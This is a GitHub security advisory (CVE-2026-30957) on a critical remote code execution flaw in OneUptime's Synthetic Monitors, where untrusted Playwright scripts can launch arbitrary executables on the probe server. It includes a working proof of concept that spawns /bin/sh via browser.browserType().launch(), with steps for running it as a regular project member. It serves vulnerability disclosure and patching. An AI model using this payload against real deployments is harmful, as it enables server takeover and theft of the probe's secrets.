GHSA-JW8Q-GJVG-8W4Q

Vulnerability from github – Published: 2026-03-10 01:12 – Updated: 2026-03-10 18:45
VLAI?
Summary
OneUptime has Synthetic Monitor RCE via exposed Playwright browser object
Details

Summary

OneUptime Synthetic Monitors allow a low-privileged authenticated project user to execute arbitrary commands on the oneuptime-probe server/container.

The root cause is that untrusted Synthetic Monitor code is executed inside Node's vm while live host-realm Playwright browser and page objects are exposed to it. A malicious user can call Playwright APIs on the injected browser object and cause the probe to spawn an attacker-controlled executable.

This is a server-side remote code execution issue. It does not require a separate vm sandbox escape.

Details

A normal project member can create or edit monitors and monitor tests:

  • Monitor access control: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Models/DatabaseModels/Monitor.ts#L45-L70
  • MonitorTest access control: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Models/DatabaseModels/MonitorTest.ts#L27-L52

The dashboard exposes a Playwright code editor for Synthetic Monitors and allows a user to queue a test run:

  • Synthetic Monitor editor: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L260-L289
  • Test Monitor flow: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L69-L83

For MonitorType.SyntheticMonitor, attacker-controlled customCode is passed into SyntheticMonitor.execute(...):

  • https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Utils/Monitors/Monitor.ts#L323-L338

SyntheticMonitor.execute(...) then calls VMRunner.runCodeInNodeVM(...) and injects live Playwright objects into the VM context:

  • https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168

Relevant code path:

result = await VMRunner.runCodeInNodeVM({
  code: options.script,
  options: {
    timeout: PROBE_SYNTHETIC_MONITOR_SCRIPT_TIMEOUT_IN_MS,
    args: {},
    context: {
      browser: browserSession.browser,
      page: browserSession.page,
      screenSizeType: options.screenSizeType,
      browserType: options.browserType,
    },
  },
});

VMRunner.runCodeInNodeVM(...) wraps host objects in proxies, but it still forwards normal method calls with the real host this binding. It only blocks a few property names such as constructor, __proto__, prototype, and mainModule:

  • Blocked properties: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Server/Utils/VM/VMRunner.ts#L20-L25
  • Real host this binding during method calls: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Server/Utils/VM/VMRunner.ts#L81-L103
  • Additional context injection into the VM: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Server/Utils/VM/VMRunner.ts#L388-L395

Because of that, untrusted code can still use legitimate Playwright methods on the injected browser object.

The probe pins Playwright 1.58.2:

  • https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/package-lock.json#L4438-L4459

In that version, Browser.browserType() returns a BrowserType object, and BrowserType.launch() accepts attacker-controlled executablePath, ignoreDefaultArgs, and args. Playwright then passes those values into a child-process spawn path.

As a result, a malicious Synthetic Monitor can do this from inside the sandboxed script:

browser.browserType().launch({
  executablePath: "/bin/sh",
  ignoreDefaultArgs: true,
  args: ["-c", "id"],
});

Even if Playwright later throws because the spawned process is not a real browser, the command has already executed.

This execution path is reachable through both one-shot monitor testing and normal scheduled monitor execution:

  • Monitor tests fetched by the probe: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85
  • Scheduled monitor execution: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Jobs/Monitor/FetchList.ts#L96-L126

This appears distinct from prior node:vm breakout issues because the exploit does not need to recover process from the VM. The dangerous capability is already exposed by design through the injected Playwright object.

PoC

  1. Log in to the dashboard as a regular project member.
  2. Go to Monitors -> Create New Monitor.
  3. Select Synthetic Monitor.
  4. In the Playwright code field, paste:
 browser.browserType().launch({
    executablePath: "/bin/sh",
    ignoreDefaultArgs: true,
    args: [
      "-c",
      "id"
    ],
    timeout: 1000,
  }).catch((err) => {
    console.log(String(err));
  });

  return {
    data: {
      launched: true
    }
  };
  1. Select one browser type, for example Chromium.
  2. Select one screen type, for example Desktop.
  3. Set retry count to 0.
  4. Click Test Monitor and choose any probe.

Expected result:

  • the monitor execution succeeded and in the Show More Details the command output is shown. image

Impact

This is a server-side Remote Code Execution issue affecting the probe component.

Who is impacted:

  • any OneUptime deployment where an attacker can obtain ordinary project membership
  • environments where the probe has access to internal services, secrets, Kubernetes metadata, database credentials, proxy credentials, or other cluster-local trust relationships
Severity ?
9.9 (Critical)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oneuptime/common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30957"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-10T01:12:59Z",
    "nvd_published_at": "2026-03-10T18:18:54Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nOneUptime Synthetic Monitors allow a low-privileged authenticated project user to execute arbitrary commands on the `oneuptime-probe` server/container.\n\nThe root cause is that untrusted Synthetic Monitor code is executed inside Node\u0027s `vm` while live host-realm Playwright `browser` and `page` objects are exposed to it. A malicious user can call Playwright APIs on the injected `browser` object and cause the probe to spawn an attacker-controlled executable.\n\nThis is a server-side remote code execution issue. It does not require a separate `vm` sandbox escape.\n\n## Details\n\nA normal project member can create or edit monitors and monitor tests:\n\n- `Monitor` access control: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Models/DatabaseModels/Monitor.ts#L45-L70\n- `MonitorTest` access control: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Models/DatabaseModels/MonitorTest.ts#L27-L52\n\nThe dashboard exposes a Playwright code editor for Synthetic Monitors and allows a user to queue a test run:\n\n- Synthetic Monitor editor: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L260-L289\n- `Test Monitor` flow: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L69-L83\n\nFor `MonitorType.SyntheticMonitor`, attacker-controlled `customCode` is passed into `SyntheticMonitor.execute(...)`:\n\n- https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Utils/Monitors/Monitor.ts#L323-L338\n\n`SyntheticMonitor.execute(...)` then calls `VMRunner.runCodeInNodeVM(...)` and injects live Playwright objects into the VM context:\n\n- https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168\n\nRelevant code path:\n\n```ts\nresult = await VMRunner.runCodeInNodeVM({\n  code: options.script,\n  options: {\n    timeout: PROBE_SYNTHETIC_MONITOR_SCRIPT_TIMEOUT_IN_MS,\n    args: {},\n    context: {\n      browser: browserSession.browser,\n      page: browserSession.page,\n      screenSizeType: options.screenSizeType,\n      browserType: options.browserType,\n    },\n  },\n});\n```\n\n`VMRunner.runCodeInNodeVM(...)` wraps host objects in proxies, but it still forwards normal method calls with the real host `this` binding. It only blocks a few property names such as `constructor`, `__proto__`, `prototype`, and `mainModule`:\n\n- Blocked properties: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Server/Utils/VM/VMRunner.ts#L20-L25\n- Real host `this` binding during method calls: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Server/Utils/VM/VMRunner.ts#L81-L103\n- Additional context injection into the VM: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Common/Server/Utils/VM/VMRunner.ts#L388-L395\n\nBecause of that, untrusted code can still use legitimate Playwright methods on the injected `browser` object.\n\nThe probe pins Playwright `1.58.2`:\n\n- https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/package-lock.json#L4438-L4459\n\nIn that version, `Browser.browserType()` returns a `BrowserType` object, and `BrowserType.launch()` accepts attacker-controlled `executablePath`, `ignoreDefaultArgs`, and `args`. Playwright then passes those values into a child-process spawn path.\n\nAs a result, a malicious Synthetic Monitor can do this from inside the sandboxed script:\n\n```javascript\nbrowser.browserType().launch({\n  executablePath: \"/bin/sh\",\n  ignoreDefaultArgs: true,\n  args: [\"-c\", \"id\"],\n});\n```\n\nEven if Playwright later throws because the spawned process is not a real browser, the command has already executed.\n\nThis execution path is reachable through both one-shot monitor testing and normal scheduled monitor execution:\n\n- Monitor tests fetched by the probe: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85\n- Scheduled monitor execution: https://github.com/OneUptime/oneuptime/blob/707bfd62e721a2845ee05b87cb5d3c611bda2276/Probe/Jobs/Monitor/FetchList.ts#L96-L126\n\nThis appears distinct from prior `node:vm` breakout issues because the exploit does not need to recover `process` from the VM. The dangerous capability is already exposed by design through the injected Playwright object.\n\n### PoC\n\n1. Log in to the dashboard as a regular project member.\n2. Go to `Monitors` -\u003e `Create New Monitor`.\n3. Select `Synthetic Monitor`.\n4. In the Playwright code field, paste:\n\n```javascript\n browser.browserType().launch({\n    executablePath: \"/bin/sh\",\n    ignoreDefaultArgs: true,\n    args: [\n      \"-c\",\n      \"id\"\n    ],\n    timeout: 1000,\n  }).catch((err) =\u003e {\n    console.log(String(err));\n  });\n\n  return {\n    data: {\n      launched: true\n    }\n  };\n```\n\n5. Select one browser type, for example `Chromium`.\n6. Select one screen type, for example `Desktop`.\n7. Set retry count to `0`.\n8. Click `Test Monitor` and choose any probe.\n\nExpected result:\n\n- the monitor execution succeeded and in the Show More Details the command output is shown.\n\u003cimg width=\"1537\" height=\"220\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4fa5b458-cae9-4ec8-add0-bfc288ee7568\" /\u003e\n\n### Impact\nThis is a server-side Remote Code Execution issue affecting the probe component.\n\nWho is impacted:\n\n- any OneUptime deployment where an attacker can obtain ordinary project membership\n- environments where the probe has access to internal services, secrets, Kubernetes metadata, database credentials, proxy credentials, or other cluster-local trust relationships",
  "id": "GHSA-jw8q-gjvg-8w4q",
  "modified": "2026-03-10T18:45:14Z",
  "published": "2026-03-10T01:12:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-jw8q-gjvg-8w4q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30957"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.21"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OneUptime has Synthetic Monitor RCE via exposed Playwright browser object"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.